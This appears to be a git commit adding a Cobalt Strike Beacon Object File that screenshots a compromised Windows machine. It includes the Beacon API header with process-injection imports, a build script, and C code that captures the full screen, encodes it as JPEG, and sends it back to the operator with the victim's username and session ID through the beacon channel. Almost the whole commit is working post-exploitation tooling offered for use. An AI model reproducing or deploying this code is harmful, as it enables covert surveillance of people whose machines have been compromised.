Upload Code

2023-02-20 20:53:40 +08:00 · 2023-02-20 20:53:40 +08:00 · db1d3de4dc
parent 2a586d8e96
commit db1d3de4dc
4 changed files with 287 additions and 1 deletions
--- a/README.md
+++ b/README.md
@ -1,2 +1,3 @@
 # ScreenShot-BOF
- 
+
+inline-execute screenshot.x64.o
--- a/beacon.h
+++ b/beacon.h
@ -0,0 +1,61 @@
+/*
+ * Beacon Object Files (BOF)
+ * -------------------------
+ * A Beacon Object File is a light-weight post exploitation tool that runs
+ * with Beacon's inline-execute command.
+ *
+ * Cobalt Strike 4.1.
+ */
+
+/* data API */
+typedef struct {
+	char * original; /* the original buffer [so we can free it] */
+	char * buffer;   /* current pointer into our buffer */
+	int    length;   /* remaining length of data */
+	int    size;     /* total size of this buffer */
+} datap;
+
+DECLSPEC_IMPORT void    BeaconDataParse(datap * parser, char * buffer, int size);
+DECLSPEC_IMPORT int     BeaconDataInt(datap * parser);
+DECLSPEC_IMPORT short   BeaconDataShort(datap * parser);
+DECLSPEC_IMPORT int     BeaconDataLength(datap * parser);
+DECLSPEC_IMPORT char *  BeaconDataExtract(datap * parser, int * size);
+
+/* format API */
+typedef struct {
+	char * original; /* the original buffer [so we can free it] */
+	char * buffer;   /* current pointer into our buffer */
+	int    length;   /* remaining length of data */
+	int    size;     /* total size of this buffer */
+} formatp;
+
+DECLSPEC_IMPORT void    BeaconFormatAlloc(formatp * format, int maxsz);
+DECLSPEC_IMPORT void    BeaconFormatReset(formatp * format);
+DECLSPEC_IMPORT void    BeaconFormatFree(formatp * format);
+DECLSPEC_IMPORT void    BeaconFormatAppend(formatp * format, char * text, int len);
+DECLSPEC_IMPORT void    BeaconFormatPrintf(formatp * format, char * fmt, ...);
+DECLSPEC_IMPORT char *  BeaconFormatToString(formatp * format, int * size);
+DECLSPEC_IMPORT void    BeaconFormatInt(formatp * format, int value);
+
+/* Output Functions */
+#define CALLBACK_OUTPUT      0x0
+#define CALLBACK_OUTPUT_OEM  0x1e
+#define CALLBACK_ERROR       0x0d
+#define CALLBACK_OUTPUT_UTF8 0x20
+
+DECLSPEC_IMPORT void   BeaconPrintf(int type, char * fmt, ...);
+DECLSPEC_IMPORT void   BeaconOutput(int type, char * data, int len);
+
+/* Token Functions */
+DECLSPEC_IMPORT BOOL   BeaconUseToken(HANDLE token);
+DECLSPEC_IMPORT void   BeaconRevertToken();
+DECLSPEC_IMPORT BOOL   BeaconIsAdmin();
+
+/* Spawn+Inject Functions */
+DECLSPEC_IMPORT void   BeaconGetSpawnTo(BOOL x86, char * buffer, int length);
+DECLSPEC_IMPORT void   BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len);
+DECLSPEC_IMPORT void   BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len);
+DECLSPEC_IMPORT void   BeaconCleanupProcess(PROCESS_INFORMATION * pInfo);
+
+/* Utility Functions */
+DECLSPEC_IMPORT BOOL   toWideChar(char * src, wchar_t * dst, int max);
--- a/build.bat
+++ b/build.bat
@ -0,0 +1,5 @@
+@echo off
+set PLAT="x86"
+IF "%Platform%"=="x64" set PLAT="x64"
+
+cl.exe /GS- /nologo /c screenshot.c /Foscreenshot.%PLAT%.o
--- a/screenshot.c
+++ b/screenshot.c
@ -0,0 +1,219 @@
+#include <Objbase.h>
+#include <wincodec.h>
+#include <Winerror.h>
+#include <assert.h>
+#include <windows.h>
+#include <wchar.h>
+#include "beacon.h"
+
+#define CINTERFACE
+#define COBJMACROS
+#define CALLBACK_SCREENSHOT  0x03
+#define SUCCEEDED(hr)   (((HRESULT)(hr)) >= 0)
+
+CONST GUID GUID_ContainerFormatJpeg= { 0x19e4a5aa, 0x5662, 0x4fc5, 0xa0, 0xc0, 0x17, 0x58, 0x02, 0x8e, 0x10, 0x57};
+CONST GUID GUID_WICPixelFormat24bppBGR= { 0x6fddc324, 0x4e03, 0x4bfe, 0xb1, 0x85, 0x3d, 0x77, 0x76, 0x8d, 0xc9, 0x0c};
+CONST GUID CLSID_WICImagingFactory2= { 0x317d06e8, 0x5f24, 0x433d, 0xbd, 0xf7, 0x79, 0xce, 0x68, 0xd8, 0xab, 0xc2};
+CONST GUID IID_IWICImagingFactory = {0xec5ec8a9,0xc395,0x4314,0x9c,0x77,0x54,0xd7,0xa9,0x35,0xff,0x70};
+
+DECLSPEC_IMPORT void *__cdecl MSVCRT$malloc(size_t size);
+WINBASEAPI void __cdecl MSVCRT$memset(void *dest, int c, size_t count);
+WINBASEAPI int __cdecl MSVCRT$_snprintf(char * ,size_t ,const char * ,...);
+DECLSPEC_IMPORT BOOL     WINAPI   KERNEL32$ProcessIdToSessionId(DWORD, DWORD *);
+DECLSPEC_IMPORT DWORD    WINAPI   KERNEL32$GetCurrentProcessId();
+DECLSPEC_IMPORT HRESULT  WINAPI   OLE32$CoInitializeEx(LPVOID, DWORD);
+DECLSPEC_IMPORT int WINAPI User32$GetSystemMetrics(int nIndex);
+DECLSPEC_IMPORT HDC WINAPI User32$GetDC(HWND hWnd);
+DECLSPEC_IMPORT HDC WINAPI GDI32$CreateCompatibleDC(HDC hdc);
+DECLSPEC_IMPORT char* WINAPI MSVCRT$getenv(const char *varname);
+DECLSPEC_IMPORT HBITMAP WINAPI GDI32$CreateCompatibleBitmap(HDC hdc, int cx, int cy);
+DECLSPEC_IMPORT HGDIOBJ WINAPI GDI32$SelectObject(HDC hdc, HGDIOBJ h);
+DECLSPEC_IMPORT BOOL WINAPI GDI32$BitBlt(HDC hdc, int x, int y, int cx, int cy, HDC hdcSrc, int x1, int y1, DWORD rop);
+DECLSPEC_IMPORT int WINAPI GDI32$GetObjectW(HANDLE h,int c,LPVOID pv);
+DECLSPEC_IMPORT HRESULT  WINAPI   OLE32$CoCreateInstance(REFCLSID rclsid, LPUNKNOWN pUnkOuter, DWORD dwClsContext, REFIID riid, LPVOID* ppv);
+DECLSPEC_IMPORT HGDIOBJ WINAPI GDI32$DeleteObject(HGDIOBJ ho);
+DECLSPEC_IMPORT int WINAPI User32$ReleaseDC(HWND hWnd, HDC  hDC);
+
+void downloadScreenshot(char* jpg, int jpgLen, int session, char* windowTitle, int titleLen, char* username, int usernameLen) {
+    int messageLength;
+    char* packedData ;
+    int packedIndex = 4;
+    int i;
+    messageLength = 4 + jpgLen + 4 + 4 + titleLen + 4 + usernameLen;
+    packedData = (char*)MSVCRT$malloc(messageLength);
+    packedData[0] = jpgLen & 0xFF;
+    packedData[1] = (jpgLen >> 8) & 0xFF;
+    packedData[2] = (jpgLen >> 16) & 0xFF;
+    packedData[3] = (jpgLen >> 24) & 0xFF;
+    for (i = 0; i < jpgLen; i++) {
+        packedData[packedIndex] = jpg[i];
+        packedIndex++;
+    }
+    packedData[packedIndex] = session & 0xFF;
+    packedData[packedIndex + 1] = (session >> 8) & 0xFF;
+    packedData[packedIndex + 2] = (session >> 16) & 0xFF;
+    packedData[packedIndex + 3] = (session >> 24) & 0xFF;
+    packedData[packedIndex + 4] = titleLen & 0xFF;
+    packedData[packedIndex + 5] = (titleLen >> 8) & 0xFF;
+    packedData[packedIndex + 6] = (titleLen >> 16) & 0xFF;
+    packedData[packedIndex + 7] = (titleLen >> 24) & 0xFF;
+    packedIndex += 8;
+    for (i = 0; i < titleLen; i++) {
+        packedData[packedIndex] = windowTitle[i];
+        packedIndex++;
+    }
+    packedData[packedIndex] = usernameLen & 0xFF;
+    packedData[packedIndex + 1] = (usernameLen >> 8) & 0xFF;
+    packedData[packedIndex + 2] = (usernameLen >> 16) & 0xFF;
+    packedData[packedIndex + 3] = (usernameLen >> 24) & 0xFF;
+    packedIndex += 4;
+    for (i = 0; i < usernameLen; i++) {
+        packedData[packedIndex] = username[i];
+        packedIndex++;
+    }
+    BeaconOutput(CALLBACK_SCREENSHOT, packedData, messageLength);
+    return;
+}
+
+
+int go()
+{
+    HANDLE hDIB;
+    HANDLE hFile;
+    DWORD dwBmpSize;
+    DWORD dwSizeofDIB;
+    DWORD dwBytesWritten;
+    HBITMAP hbmScreen = NULL;
+    BITMAP bmpScreen;
+    BITMAPFILEHEADER bmfHeader;
+    BITMAPINFOHEADER bi;
+    CHAR* lpbitmap;
+    BITMAP bm_info = { 0 };
+    IWICImagingFactory* factory = NULL;
+    IWICBitmap* wic_bitmap = NULL;
+    IWICStream* stream = NULL;
+    IWICBitmapEncoder* encoder = NULL;
+    IWICBitmapFrameEncode* frame = NULL;
+    HRESULT hr = S_OK;
+    BYTE* Memory;
+    
+    char* user = (char*)MSVCRT$getenv("USERNAME");
+    char title[] = "ScreenShot BOF";
+    int userLength = MSVCRT$_snprintf(NULL, 0, "%s", user);
+    int titleLength = MSVCRT$_snprintf(NULL, 0, "%s", title);
+    DWORD session = -1;
+    INT width = User32$GetSystemMetrics(SM_CXSCREEN);
+    INT height = User32$GetSystemMetrics(SM_CYSCREEN);
+    HDC hdcScreen = User32$GetDC(NULL);
+    HDC hdcMemDC = GDI32$CreateCompatibleDC(hdcScreen);
+    if (!hdcMemDC)
+    {
+        goto done;
+    }
+    hbmScreen = GDI32$CreateCompatibleBitmap(hdcScreen, width, height);
+    if (!hbmScreen)
+    {
+        goto done;
+    }
+    GDI32$SelectObject(hdcMemDC, hbmScreen);
+    if (!GDI32$BitBlt(
+        hdcMemDC,
+        0, 0,
+        width, height,
+        hdcScreen,
+        0, 0,
+        SRCCOPY))
+    {
+        goto done;
+    }
+    GDI32$GetObjectW(hbmScreen, sizeof(BITMAP), &bmpScreen);
+    bi.biSize = sizeof(BITMAPINFOHEADER);
+    bi.biWidth = bmpScreen.bmWidth;
+    bi.biHeight = bmpScreen.bmHeight;
+    bi.biPlanes = 1;
+    bi.biBitCount = 32;
+    bi.biCompression = BI_RGB;
+    bi.biSizeImage = 0;
+    bi.biXPelsPerMeter = 0;
+    bi.biYPelsPerMeter = 0;
+    bi.biClrUsed = 0;
+    bi.biClrImportant = 0;
+    dwBmpSize = ((bmpScreen.bmWidth * bi.biBitCount + 31) / 32) * 4 * bmpScreen.bmHeight;
+    Memory = MSVCRT$malloc(500 * 1024);
+    MSVCRT$memset(Memory, 0, 500 * 1024);
+    hr = OLE32$CoInitializeEx(NULL, COINIT_APARTMENTTHREADED | COINIT_DISABLE_OLE1DDE);
+    if (!GDI32$GetObjectW(hbmScreen, sizeof(bm_info), &bm_info)) {
+        hr = E_FAIL;
+    }
+    factory = NULL;
+    if (SUCCEEDED(hr)) {
+        hr = OLE32$CoCreateInstance(&CLSID_WICImagingFactory, NULL, CLSCTX_INPROC_SERVER,
+            &IID_IWICImagingFactory, &factory);
+    }
+    wic_bitmap = NULL;
+    if (SUCCEEDED(hr)) {
+        hr = IWICImagingFactory_CreateBitmapFromHBITMAP(factory, hbmScreen, NULL,
+            WICBitmapIgnoreAlpha,
+            &wic_bitmap);
+    }
+    stream = NULL;
+    if (SUCCEEDED(hr)) {
+        hr = IWICImagingFactory_CreateStream(factory, &stream);
+    }
+    if (SUCCEEDED(hr)) {
+        hr = IWICStream_InitializeFromMemory(stream, Memory, 500 * 1024);
+    }
+    encoder = NULL;
+    if (SUCCEEDED(hr)) {
+        hr = IWICImagingFactory_CreateEncoder(factory, &GUID_ContainerFormatJpeg, NULL, &encoder);
+    }
+    if (SUCCEEDED(hr)) {
+        hr = IWICBitmapEncoder_Initialize(encoder, (IStream*)stream, WICBitmapEncoderNoCache);
+    }
+    frame = NULL;
+    if (SUCCEEDED(hr)) {
+        hr = IWICBitmapEncoder_CreateNewFrame(encoder, &frame, NULL);
+    }
+    if (SUCCEEDED(hr)) {
+        hr = IWICBitmapFrameEncode_Initialize(frame, NULL);
+    }
+    if (SUCCEEDED(hr)) {
+        hr = IWICBitmapFrameEncode_SetSize(frame, bm_info.bmWidth, bm_info.bmHeight);
+    }
+    if (SUCCEEDED(hr)) {
+        GUID pixel_format = GUID_WICPixelFormat24bppBGR;
+        hr = IWICBitmapFrameEncode_SetPixelFormat(frame, &pixel_format);
+    }
+    if (SUCCEEDED(hr)) {
+        hr = IWICBitmapFrameEncode_WriteSource(frame, (IWICBitmapSource*)wic_bitmap, NULL);
+    }
+    if (SUCCEEDED(hr)) {
+        hr = IWICBitmapFrameEncode_Commit(frame);
+    }
+    if (SUCCEEDED(hr)) {
+        hr = IWICBitmapEncoder_Commit(encoder);
+    }
+    KERNEL32$ProcessIdToSessionId(KERNEL32$GetCurrentProcessId(), &session);
+    downloadScreenshot((char*)Memory, 500*1024, session, (char*)title, titleLength, (char*)user, userLength);
+    if (frame) {
+        IWICBitmapFrameEncode_Release(frame);
+    }
+    if (encoder) {
+        IWICBitmapEncoder_Release(encoder);
+    }
+    if (stream) {
+        IWICStream_Release(stream);
+    }
+    if (wic_bitmap) {
+        IWICBitmap_Release(wic_bitmap);
+    }
+    if (factory) {
+        IWICImagingFactory_Release(factory);
+    }
+done:
+    GDI32$DeleteObject(hbmScreen);
+    GDI32$DeleteObject(hdcMemDC);
+    User32$ReleaseDC(NULL, hdcScreen);
+    return 0;
+}
+